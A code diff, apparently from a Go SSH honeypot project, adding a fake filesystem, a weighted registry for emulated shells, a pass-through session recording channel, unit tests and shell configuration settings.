return "", fmt.Errorf("cat: %s: Is a directory", p)
}
return n.content, nil
}
func (fs *filesystem) mkdirAll(p string) {
p = path.Clean(p)
parts := strings.Split(strings.TrimPrefix(p, "/"), "/")
node := fs.root
for _, part := range parts {
if node.children == nil {
node.children = make(map[string]*fsNode)
}
child, ok := node.children[part]
if !ok {
child = &fsNode{name: part, isDir: true, children: make(map[string]*fsNode)}
node.children[part] = child
}
node = child
}
}
func (fs *filesystem) writeFile(p string, content string) {
p = path.Clean(p)
dir := path.Dir(p)
base := path.Base(p)
fs.mkdirAll(dir)
parent := fs.lookup(dir)
parent.children[base] = &fsNode{name: base, content: content}
}

View File

@@ -0,0 +1,140 @@
package bash
import (
"sort"
"testing"
)
func TestNewFilesystem(t *testing.T) {
fs := newFilesystem("testhost")
// Standard directories should exist.
for _, dir := range []string{"/etc", "/root", "/home", "/var/log", "/tmp", "/usr/bin"} {
if !fs.isDirectory(dir) {
t.Errorf("%s should be a directory", dir)
}
}
// Standard files should exist.
for _, file := range []string{"/etc/passwd", "/etc/hostname", "/root/.bashrc", "/tmp/notes.txt"} {
if !fs.exists(file) {
t.Errorf("%s should exist", file)
}
}
}
func TestFilesystemHostname(t *testing.T) {
fs := newFilesystem("myhost")
content, err := fs.read("/etc/hostname")
if err != nil {
t.Fatalf("read /etc/hostname: %v", err)
}
if content != "myhost\n" {
t.Errorf("hostname content = %q, want %q", content, "myhost\n")
}
}
func TestResolvePath(t *testing.T) {
tests := []struct {
cwd string
arg string
want string
}{
{"/root", "file.txt", "/root/file.txt"},
{"/root", "/etc/passwd", "/etc/passwd"},
{"/root", "..", "/"},
{"/var/log", "../..", "/"},
{"/root", ".", "/root"},
{"/root", "./sub/file", "/root/sub/file"},
{"/", "etc", "/etc"},
}
for _, tt := range tests {
got := resolvePath(tt.cwd, tt.arg)
if got != tt.want {
t.Errorf("resolvePath(%q, %q) = %q, want %q", tt.cwd, tt.arg, got, tt.want)
}
}
}
func TestFilesystemList(t *testing.T) {
fs := newFilesystem("testhost")
names, err := fs.list("/etc")
if err != nil {
t.Fatalf("list /etc: %v", err)
}
sort.Strings(names)
// Should contain at least passwd, hostname, hosts.
found := map[string]bool{}
for _, n := range names {
found[n] = true
}
for _, want := range []string{"passwd", "hostname", "hosts"} {
if !found[want] {
t.Errorf("list /etc missing %q, got %v", want, names)
}
}
}
func TestFilesystemListNonexistent(t *testing.T) {
fs := newFilesystem("testhost")
_, err := fs.list("/nonexistent")
if err == nil {
t.Fatal("expected error listing nonexistent directory")
}
}
func TestFilesystemListFile(t *testing.T) {
fs := newFilesystem("testhost")
_, err := fs.list("/etc/passwd")
if err == nil {
t.Fatal("expected error listing a file")
}
}
func TestFilesystemRead(t *testing.T) {
fs := newFilesystem("testhost")
content, err := fs.read("/etc/passwd")
if err != nil {
t.Fatalf("read: %v", err)
}
if content == "" {
t.Error("expected non-empty content")
}
}
func TestFilesystemReadNonexistent(t *testing.T) {
fs := newFilesystem("testhost")
_, err := fs.read("/no/such/file")
if err == nil {
t.Fatal("expected error for nonexistent file")
}
}
func TestFilesystemReadDirectory(t *testing.T) {
fs := newFilesystem("testhost")
_, err := fs.read("/etc")
if err == nil {
t.Fatal("expected error for reading a directory")
}
}
func TestFilesystemDirectoryListing(t *testing.T) {
fs := newFilesystem("testhost")
names, err := fs.list("/")
if err != nil {
t.Fatalf("list /: %v", err)
}
// Root directories should end with /
found := map[string]bool{}
for _, n := range names {
found[n] = true
}
for _, want := range []string{"etc/", "root/", "home/", "var/", "tmp/", "usr/"} {
if !found[want] {
t.Errorf("list / missing %q, got %v", want, names)
}
}
}

View File

@@ -0,0 +1,19 @@
package shell
import "io"
// RecordingChannel wraps an io.ReadWriteCloser. In Phase 1.4 it is a
// pass-through; Phase 2.3 will add byte-level keystroke recording here
// without changing any shell code.
type RecordingChannel struct {
inner io.ReadWriteCloser
}
// NewRecordingChannel returns a RecordingChannel wrapping rw.
func NewRecordingChannel(rw io.ReadWriteCloser) *RecordingChannel {
return &RecordingChannel{inner: rw}
}
func (r *RecordingChannel) Read(p []byte) (int, error) { return r.inner.Read(p) }
func (r *RecordingChannel) Write(p []byte) (int, error) { return r.inner.Write(p) }
func (r *RecordingChannel) Close() error { return r.inner.Close() }

View File

@@ -0,0 +1,43 @@
package shell
import (
"bytes"
"io"
"testing"
)
// nopCloser wraps a ReadWriter with a no-op Close.
type nopCloser struct {
io.ReadWriter
}
func (nopCloser) Close() error { return nil }
func TestRecordingChannelPassthrough(t *testing.T) {
var buf bytes.Buffer
rc := NewRecordingChannel(nopCloser{&buf})
// Write through the recorder.
msg := []byte("hello")
n, err := rc.Write(msg)
if err != nil {
t.Fatalf("Write: %v", err)
}
if n != len(msg) {
t.Errorf("Write n = %d, want %d", n, len(msg))
}
// Read through the recorder.
out := make([]byte, 16)
n, err = rc.Read(out)
if err != nil {
t.Fatalf("Read: %v", err)
}
if string(out[:n]) != "hello" {
t.Errorf("Read = %q, want %q", out[:n], "hello")
}
if err := rc.Close(); err != nil {
t.Fatalf("Close: %v", err)
}
}

View File

@@ -0,0 +1,84 @@
package shell
import (
"errors"
"fmt"
"math/rand/v2"
"sync"
)
type registryEntry struct {
shell Shell
weight int
}
// Registry holds shells with associated weights for random selection.
type Registry struct {
mu sync.RWMutex
entries []registryEntry
}
// NewRegistry returns an empty Registry.
func NewRegistry() *Registry {
return &Registry{}
}
// Register adds a shell with the given weight. Weight must be >= 1 and
// no duplicate names are allowed.
func (r *Registry) Register(shell Shell, weight int) error {
if weight < 1 {
return fmt.Errorf("weight must be >= 1, got %d", weight)
}
r.mu.Lock()
defer r.mu.Unlock()
for _, e := range r.entries {
if e.shell.Name() == shell.Name() {
return fmt.Errorf("shell %q already registered", shell.Name())
}
}
r.entries = append(r.entries, registryEntry{shell: shell, weight: weight})
return nil
}
// Select picks a shell using weighted random selection.
func (r *Registry) Select() (Shell, error) {
r.mu.RLock()
defer r.mu.RUnlock()
if len(r.entries) == 0 {
return nil, errors.New("no shells registered")
}
total := 0
for _, e := range r.entries {
total += e.weight
}
pick := rand.IntN(total)
cumulative := 0
for _, e := range r.entries {
cumulative += e.weight
if pick < cumulative {
return e.shell, nil
}
}
// Should never reach here, but return last entry as fallback.
return r.entries[len(r.entries)-1].shell, nil
}
// Get returns a shell by name.
func (r *Registry) Get(name string) (Shell, bool) {
r.mu.RLock()
defer r.mu.RUnlock()
for _, e := range r.entries {
if e.shell.Name() == name {
return e.shell, true
}
}
return nil, false
}

View File

@@ -0,0 +1,107 @@
package shell
import (
"context"
"io"
"testing"
)
// stubShell implements Shell for testing.
type stubShell struct {
name string
}
func (s *stubShell) Name() string { return s.name }
func (s *stubShell) Description() string { return "stub" }
func (s *stubShell) Handle(_ context.Context, _ *SessionContext, _ io.ReadWriteCloser) error {
return nil
}
func TestRegistryRegisterAndGet(t *testing.T) {
r := NewRegistry()
sh := &stubShell{name: "test"}
if err := r.Register(sh, 1); err != nil {
t.Fatalf("Register: %v", err)
}
got, ok := r.Get("test")
if !ok {
t.Fatal("Get returned false")
}
if got.Name() != "test" {
t.Errorf("Name = %q, want %q", got.Name(), "test")
}
}
func TestRegistryGetMissing(t *testing.T) {
r := NewRegistry()
_, ok := r.Get("nope")
if ok {
t.Fatal("Get returned true for missing shell")
}
}
func TestRegistryDuplicateName(t *testing.T) {
r := NewRegistry()
r.Register(&stubShell{name: "dup"}, 1)
err := r.Register(&stubShell{name: "dup"}, 1)
if err == nil {
t.Fatal("expected error for duplicate name")
}
}
func TestRegistryInvalidWeight(t *testing.T) {
r := NewRegistry()
err := r.Register(&stubShell{name: "a"}, 0)
if err == nil {
t.Fatal("expected error for weight 0")
}
err = r.Register(&stubShell{name: "b"}, -1)
if err == nil {
t.Fatal("expected error for negative weight")
}
}
func TestRegistrySelectEmpty(t *testing.T) {
r := NewRegistry()
_, err := r.Select()
if err == nil {
t.Fatal("expected error from empty registry")
}
}
func TestRegistrySelectSingle(t *testing.T) {
r := NewRegistry()
r.Register(&stubShell{name: "only"}, 1)
for range 10 {
sh, err := r.Select()
if err != nil {
t.Fatalf("Select: %v", err)
}
if sh.Name() != "only" {
t.Errorf("Name = %q, want %q", sh.Name(), "only")
}
}
}
func TestRegistrySelectWeighted(t *testing.T) {
r := NewRegistry()
r.Register(&stubShell{name: "heavy"}, 100)
r.Register(&stubShell{name: "light"}, 1)
counts := map[string]int{}
for range 1000 {
sh, err := r.Select()
if err != nil {
t.Fatalf("Select: %v", err)
}
counts[sh.Name()]++
}
// "heavy" has weight 100 vs "light" weight 1, so heavy should get ~99%.
if counts["heavy"] < 900 {
t.Errorf("heavy selected %d/1000 times, expected >900", counts["heavy"])
}
}

33
internal/shell/shell.go Normal file
View File

@@ -0,0 +1,33 @@
package shell
import (
"context"
"io"
"git.t-juice.club/torjus/oubliette/internal/storage"
)
// Shell is the interface that all honeypot shell implementations must satisfy.
type Shell interface {
Name() string
Description() string
Handle(ctx context.Context, sess *SessionContext, rw io.ReadWriteCloser) error
}
// SessionContext carries metadata about the current SSH session.
type SessionContext struct {
SessionID string
Username string
RemoteAddr string
ClientVersion string
Store storage.Store
ShellConfig map[string]any
CommonConfig ShellCommonConfig
}
// ShellCommonConfig holds settings shared across all shell types.
type ShellCommonConfig struct {
Hostname string
Banner string
FakeUser string // override username in prompt; empty = use authenticated user
}

View File

@@ -22,3 +22,8 @@ password = "admin"
db_path = "oubliette.db" db_path = "oubliette.db"
retention_days = 90 retention_days = 90
retention_interval = "1h" retention_interval = "1h"
[shell]
hostname = "ubuntu-server"
# banner = "Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-89-generic x86_64)\r\n\r\n"
# fake_user = "" # override username in prompt; empty = use authenticated user